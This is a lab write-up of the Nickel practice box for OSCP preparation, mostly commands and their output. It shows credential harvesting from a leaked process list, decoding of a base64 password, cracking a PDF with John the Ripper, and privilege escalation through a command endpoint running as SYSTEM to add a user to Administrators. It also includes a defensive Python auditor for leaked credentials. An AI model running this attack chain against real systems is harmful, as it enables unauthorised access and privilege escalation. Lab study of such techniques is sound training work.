In this practice box from Hack The Box (HTB), we explore one of the machines from TJNull’s list, which is widely recognized as part of the essential preparation for the Offensive Security Certified Professional (OSCP) exam. TJNull’s curated list is designed to help individuals hone their penetration testing skills and get accustomed to the types…
Nmap scan:
|_ SYST: UNIX emulated by FileZilla
22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey:
| 3072 86:84:fd:d5:43:27:05:cf:a7:f2:e9:e2:75:70:d5:f3 (RSA)
| 256 9c:93:cf:48:a9:4e:70:f4:60:de:e1:a9:c2:c0:b6:ff (ECDSA)
|_ 256 00:4e:d7:3b:0f:9f:e3:74:4d:04:99:0b:b1:8b:de:a5 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2023-10-07T13:16:27+00:00; +5s from scanner time.
| rdp-ntlm-info:
| Target_Name: NICKEL
| NetBIOS_Domain_Name: NICKEL
| NetBIOS_Computer_Name: NICKEL
| DNS_Domain_Name: nickel
| DNS_Computer_Name: nickel
| Product_Version: 10.0.18362
|_ System_Time: 2023-10-07T13:15:17+00:00
| ssl-cert: Subject: commonName=nickel
| Not valid before: 2023-10-06T13:12:47
|_Not valid after: 2024-04-06T13:12:47
8089/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Site doesn't have a title.
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 4s, deviation: 0s, median: 3s
|_smb2-security-mode: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
|_smb2-time: ERROR: Script execution failed (use -d to debug)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.10 seconds
Low-hanging fruit: HTTP
None of the links work: 169.254.109.39 (a link-local address) is the IP they try to reach.
Enumerating with ffuf:
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.156.99:8089//FUZZ
Nothing comes out of ffuf.
Checking the links, they point to:
http://169.254.109.39:33333/list-running-procs
http://169.254.109.39:33333/list-active-nodes
http://169.254.109.39:33333/list-current-deployments
We try curl on the three endpoints, substituting the target's address 192.168.156.99 for the link-local one (the VPN reconnects with a new subnet partway through, hence 192.168.180.99 afterwards), first with GET and then with POST:
╰─$ curl -X GET http://192.168.156.99:33333/list-current-deployments
^C^X^C
╭─kali@kali ~/PG/nickel
╰─$ curl -X GET http://192.168.180.99:33333/list-current-deployments
<p>Cannot "GET" /list-current-deployments</p>
╭─kali@kali ~/PG/nickel
╰─$ ps -ax | grep openvpn
╭─kali@kali ~/PG/nickel
╰─$ curl -X GET http://192.168.180.99:33333/list-active-nodes
<p>Cannot "GET" /list-active-nodes</p>
╭─kali@kali ~/PG/nickel
╰─$ curl -X GET http://192.168.180.99:33333/list-running-procs
<p>Cannot "GET" /list-running-procs</p>
╭─kali@kali ~/PG/nickel
╰─$ curl -X POST http://192.168.180.99:33333/list-current-deployments -H 'Content-Length: 0'
<p>Not Implemented</p>
╭─kali@kali ~/PG/nickel
╰─$ curl -X POST http://192.168.180.99:33333/list-active-nodes -H 'Content-Length: 0'
<p>Not Implemented</p>
╭─kali@kali ~/PG/nickel
╰─$ curl -X POST http://192.168.180.99:33333/list-running-procs -H 'Content-Length: 0'
name : System Idle Process
commandline :
name : System
commandline :
name : Registry
commandline :
name : smss.exe
commandline :
name : csrss.exe
commandline :
name : wininit.exe
commandline :
name : csrss.exe
commandline :
name : winlogon.exe
commandline : winlogon.exe
name : services.exe
commandline :
name : lsass.exe
commandline : C:\Windows\system32\lsass.exe
name : fontdrvhost.exe
commandline : "fontdrvhost.exe"
name : fontdrvhost.exe
commandline : "fontdrvhost.exe"
name : dwm.exe
commandline : "dwm.exe"
name : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws80.ps1
name : Memory Compression
commandline :
name : cmd.exe
commandline : cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p
"Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh
name : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws8089.ps1
name : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws33333.ps1
name : spoolsv.exe
commandline : C:\Windows\System32\spoolsv.exe
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
name : FileZilla Server.exe
commandline : "C:\Program Files (x86)\FileZilla Server\FileZilla Server.exe"
name : sshd.exe
commandline : "C:\Program Files\OpenSSH\OpenSSH-Win64\sshd.exe"
name : VGAuthService.exe
commandline : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
name : vmtoolsd.exe
commandline : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
name : dllhost.exe
commandline : C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
name : WmiPrvSE.exe
commandline : C:\Windows\system32\wbem\wmiprvse.exe
name : LogonUI.exe
commandline : "LogonUI.exe" /flags:0x2 /state0:0xa392c855 /state1:0x41c64e6d
name : msdtc.exe
commandline : C:\Windows\System32\msdtc.exe
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
name : SgrmBroker.exe
commandline :
name : SearchIndexer.exe
commandline : C:\Windows\system32\SearchIndexer.exe /Embedding
name : WmiApSrv.exe
commandline : C:\Windows\system32\wbem\WmiApSrv.exe
name : WmiPrvSE.exe
commandline : C:\Windows\system32\wbem\wmiprvse.exe
name : WmiPrvSE.exe
commandline : C:\Windows\system32\wbem\wmiprvse.exe
name : UpdateNotificationMgr.exe
commandline : C:\Windows\System32\UNP\UpdateNotificationMgr.exe
In the process list we find a command line carrying credentials:
cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh
The -p value looks like base64.
Decoding it with base64:
╭─kali@kali ~/PG/nickel
╰─$ echo Tm93aXNlU2xvb3BUaGVvcnkxMzkK | base64 -d
NowiseSloopTheory139
╭─kali@kali ~/PG/nickel
╰─$
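Before moving on, a defender's view of this finding: a process inventory like the one above is itself a sensitive artefact, and a base64-encoded argument is obfuscation, not protection. The following Python is an added example (not code from the writeup) that parses the listing format shown above, flags command lines carrying a password argument or a PowerShell execution-policy bypass, and masks secret values in its findings; the flag list and the sample records are constructed assumptions.

```python
import base64
import re
# Constructed sample modelled on the writeup's list-running-procs output; the
# base64 value is a made-up secret for this example, not the one from the box.
_B64 = base64.b64encode(b"ExamplePassw0rd!").decode()
SAMPLE_PROCS = (
    "name : powershell.exe\n"
    "commandline : powershell.exe -nop -ep bypass C:\\windows\\system32\\ws33333.ps1\n"
    "name : cmd.exe\n"
    "commandline : cmd.exe C:\\windows\\system32\\DevTasks.exe --deploy C:\\work\\dev.yaml "
    f'--user ariah -p "{_B64}" --server nickel-dev --protocol ssh\n'
)
# Flags that usually carry a secret as the next argument (hypothetical list, extend as needed).
PASSWORD_FLAG = re.compile(r'(?:^|\s)(?:-p|-pw|--password|--pass)\s+"?([^\s"]+)"?', re.I)
EP_BYPASS = re.compile(r'-(?:ep|executionpolicy)\s+bypass', re.I)
B64_TOKEN = re.compile(r'^[A-Za-z0-9+/]{12,}={0,2}$')

def parse_procs(text):
    """Turn the 'name : X' / 'commandline : Y' listing into (name, commandline) pairs."""
    procs, name = [], None
    for line in text.splitlines():
        key, _, value = line.partition(' :')
        if key == 'name':
            name = value.strip()
        elif key == 'commandline' and name is not None:
            procs.append((name, value.strip()))
            name = None
    return procs

def looks_like_encoded_secret(token):
    """True when the token is base64 that decodes to printable text: obfuscated, not protected."""
    if not B64_TOKEN.match(token):
        return False
    try:
        decoded = base64.b64decode(token, validate=True).decode('utf-8')
    except (ValueError, UnicodeDecodeError):
        return False
    return decoded.strip().isprintable()

def audit_command_lines(text):
    """Return (process name, reason) findings; secret values are masked, never echoed in full."""
    findings = []
    for name, cmd in parse_procs(text):
        match = PASSWORD_FLAG.search(cmd)
        if match:
            token = match.group(1)
            kind = 'base64-encoded' if looks_like_encoded_secret(token) else 'plaintext'
            findings.append((name, f'{kind} password on command line (masked: {token[:2]}...)'))
        if EP_BYPASS.search(cmd):
            findings.append((name, 'PowerShell started with execution policy bypass'))
    return findings
```

The same parser can be pointed at real `Get-Process | Select Name,CommandLine` or Sysmon event 1 exports; the fix on the host side is to pass secrets via a credential store or file with tight ACLs rather than on the command line, which any local user can read.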
Trying to log in over SSH with these credentials, and we are in:
Microsoft Windows [Version 10.0.18362.1016]
(c) 2019 Microsoft Corporation. All rights reserved.
ariah@NICKEL C:\Users\ariah>whoami
nickel\ariah
ariah@NICKEL C:\Users\ariah>cd ../
ariah@NICKEL C:\Users>cd ../
ariah@NICKEL C:\>
Looking around, we find an ftp folder with a PDF inside:
ariah@NICKEL C:\>dir
Volume in drive C has no label.
Volume Serial Number is 9451-68F7
Directory of C:\
09/01/2020 12:38 PM <DIR> ftp
09/01/2020 12:04 PM <DIR> PerfLogs
10/19/2020 08:39 AM <DIR> Program Files
09/01/2020 12:38 PM <DIR> Program Files (x86)
09/01/2020 12:38 PM <DIR> Users
09/01/2020 12:36 PM <DIR> Windows
0 File(s) 0 bytes
6 Dir(s) 7,863,914,496 bytes free
ariah@NICKEL C:\>cd ftp
ariah@NICKEL C:\ftp>dir
Volume in drive C has no label.
Volume Serial Number is 9451-68F7
Directory of C:\ftp
09/01/2020 12:38 PM <DIR> .
09/01/2020 12:38 PM <DIR> ..
09/01/2020 11:02 AM 46,235 Infrastructure.pdf
1 File(s) 46,235 bytes
2 Dir(s) 7,863,914,496 bytes free
ariah@NICKEL C:\ftp>
We fetch it over FTP using ariah's credentials:
╭─kali@kali ~/PG/nickel
╰─$ wget --no-passive-ftp ftp://ariah:NowiseSloopTheory139@192.168.180.99/Infrastructure.pdf
--2023-10-07 23:58:58-- ftp://ariah:*password*@192.168.180.99/Infrastructure.pdf
=> ‘Infrastructure.pdf’
Connecting to 192.168.180.99:21... connected.
Logging in as ariah ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD not needed.
==> SIZE Infrastructure.pdf ... 46235
==> PORT ... done. ==> RETR Infrastructure.pdf ... done.
Length: 46235 (45K) (unauthoritative)
Infrastructure.pdf 100%[=================================================>] 45.15K 78.8KB/s in 0.6s
2023-10-07 23:59:01 (78.8 KB/s) - ‘Infrastructure.pdf’ saved [46235]
╭─kali@kali ~/PG/nickel
╰─$
Opening the PDF with evince, we find it is password protected.
Using John the Ripper to crack the password; first extract the hash with pdf2john:
/usr/share/john/pdf2john.pl
╭─kali@kali ~/PG/nickel
╰─$ /usr/share/john/pdf2john.pl Infrastructure.pdf > pdf.hash
╭─kali@kali ~/PG/nickel
Cracking it with the rockyou wordlist:
╭─kali@kali ~/PG/nickel
╰─$ john pdf.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PDF [MD5 SHA2 RC4/AES 32/64])
Cost 1 (revision) is 4 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:01:32 54.37% (ETA: 00:13:11) 0g/s 85476p/s 85476c/s 85476C/s git149b..gissy7
ariah4168 (Infrastructure.pdf)
1g 0:00:01:57 DONE (2023-10-08 00:12) 0.008539g/s 85433p/s 85433c/s 85433C/s arial<3..ariadne01
Use the "--show --format=PDF" options to display all of the cracked passwords reliably
Session completed.
╭─kali@kali ~/PG/nickel
╰─$
Password: ariah4168
Contents of the PDF:
Infrastructure Notes
Temporary Command endpoint: http://nickel/?
Backup system: http://nickel-backup/backup
NAS: http://corp-nas/files
On research, we find we can run a command through that endpoint (the query string is passed to a shell).
Going back to the SSH shell we had, I load PowerShell:
ariah@NICKEL C:\Windows\System32\WindowsPowerShell>dir
Volume in drive C has no label.
Volume Serial Number is 9451-68F7
Directory of C:\Windows\System32\WindowsPowerShell
03/18/2019 09:52 PM <DIR> .
03/18/2019 09:52 PM <DIR> ..
03/18/2019 11:20 PM <DIR> v1.0
0 File(s) 0 bytes
3 Dir(s) 7,878,819,840 bytes free
ariah@NICKEL C:\Windows\System32\WindowsPowerShell>cd v1.0
Volume Serial Number is 9451-68F7
Directory of C:\Windows\System32\WindowsPowerShell\v1.0
03/18/2019 11:20 PM <DIR> .
03/18/2019 11:20 PM <DIR> ..
03/18/2019 09:46 PM 12,825 Certificate.format.ps1xml
03/18/2019 09:46 PM 5,074 Diagnostics.Format.ps1xml
03/18/2019 09:46 PM 138,223 DotNetTypes.format.ps1xml
03/18/2019 11:20 PM <DIR> en
03/18/2019 11:20 PM <DIR> en-US
03/18/2019 09:46 PM 10,144 Event.Format.ps1xml
03/18/2019 09:53 PM <DIR> Examples
03/18/2019 09:46 PM 25,526 FileSystem.format.ps1xml
03/18/2019 09:46 PM 9,164 getevent.types.ps1xml
03/18/2019 09:46 PM 91,655 Help.format.ps1xml
03/18/2019 09:46 PM 138,625 HelpV3.format.ps1xml
09/01/2020 11:49 AM <DIR> Modules
03/18/2019 09:46 PM 451,584 powershell.exe
03/18/2019 09:46 PM 395 powershell.exe.config
03/18/2019 09:46 PM 206,468 PowerShellCore.format.ps1xml
03/18/2019 09:46 PM 4,097 PowerShellTrace.format.ps1xml
03/18/2019 09:46 PM 212,480 powershell_ise.exe
03/18/2019 09:46 PM 465 powershell_ise.exe.config
03/18/2019 09:46 PM 55,808 PSEvents.dll
03/18/2019 09:45 PM 174,592 pspluginwkr.dll
03/18/2019 09:46 PM 2,560 pwrshmsg.dll
03/18/2019 09:46 PM 29,696 pwrshsip.dll
03/18/2019 09:46 PM 8,458 Registry.format.ps1xml
03/18/2019 09:52 PM <DIR> Schemas
03/18/2019 09:52 PM <DIR> SessionConfig
03/18/2019 09:46 PM 210,376 types.ps1xml
03/18/2019 09:46 PM 12,282 typesv3.ps1xml
03/18/2019 09:46 PM 16,598 WSMan.Format.ps1xml
22 File(s) 1,817,095 bytes
8 Dir(s) 7,878,819,840 bytes free
ariah@NICKEL C:\Windows\System32\WindowsPowerShell\v1.0>powershell.exe
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
Based on some research (with ChatGPT's help), the endpoint can be queried from PowerShell like this:
$response = Invoke-WebRequest 'http://nickel/?whoami' -UseBasicParsing
$charContent = [System.Text.Encoding]::UTF8.GetString($response.Content)
$charContent
PS C:\Windows\System32\WindowsPowerShell\v1.0> $response = Invoke-WebRequest 'http://nickel/?whoami' -UseBasicParsing
PS C:\Windows\System32\WindowsPowerShell\v1.0> $charContent = [System.Text.Encoding]::UTF8.GetString($response.Content)
PS C:\Windows\System32\WindowsPowerShell\v1.0> $charContent
<!doctype html><html><body>dev-api started at 2020-10-20T10:38:24
<pre>nt authority\system
</pre>
</body></html>
PS C:\Windows\System32\WindowsPowerShell\v1.0>
Since the endpoint runs as SYSTEM, we use it to add ariah to the local Administrators group. The first, URL-encoded attempt is interrupted; the second, passing the command directly in the query string, works:
$response = Invoke-WebRequest -Uri "http://nickel/?command=net%20localgroup%20Administrators%20ariah%20/add" -UseBasicParsing
$response.Content
$response = Invoke-WebRequest -Uri "http://nickel/?net localgroup Administrators ariah /add" -UseBasicParsing
$response.RawContent
PS C:\Windows\System32\WindowsPowerShell\v1.0> $response = Invoke-WebRequest -Uri "http://nickel/?command=net%20localgroup%20Administrators%20ariah%20/add" -UseBasicParsing^C
PS C:\Windows\System32\WindowsPowerShell\v1.0> $response = Invoke-WebRequest -Uri "http://nickel/?net localgroup Administrators ariah /add" -UseBasicParsing
PS C:\Windows\System32\WindowsPowerShell\v1.0> $response.RawContent
HTTP/1.1 200 OK
Content-Length: 136
Date: Sun, 08 Oct 2023 04:37:40 GMT
Last-Modified: Sat, 07 Oct 2023 21:37:40 GMT
Server: Powershell Webserver/1.2 on Microsoft-HTTPAPI/2.0
<!doctype html><html><body>dev-api started at 2020-10-20T10:38:24
<pre>The command completed successfully.
</pre>
</body></html>
PS C:\Windows\System32\WindowsPowerShell\v1.0>
Log out of SSH and connect again so the new group membership is reflected in the token:
ariah@NICKEL C:\Users\ariah>whoami /groups
GROUP INFORMATION
-----------------
Group Name                                                    Type             SID          Attributes
============================================================= ================ ============ ==================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK                                          Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level                          Label            S-1-16-12288
ariah@NICKEL C:\Users\ariah>
With administrator rights we can now read the Administrator's desktop, where the proof file sits:
Directory of C:\Users\Administrator\Desktop
09/01/2020 12:41 PM <DIR> .
09/01/2020 12:41 PM <DIR> ..
09/01/2020 12:36 PM 1,450 Microsoft Edge.lnk
10/07/2023 07:52 PM 34 proof.txt
2 File(s) 1,484 bytes
2 Dir(s) 7,877,165,056 bytes free
ariah@NICKEL C:\Users\Administrator\Desktop>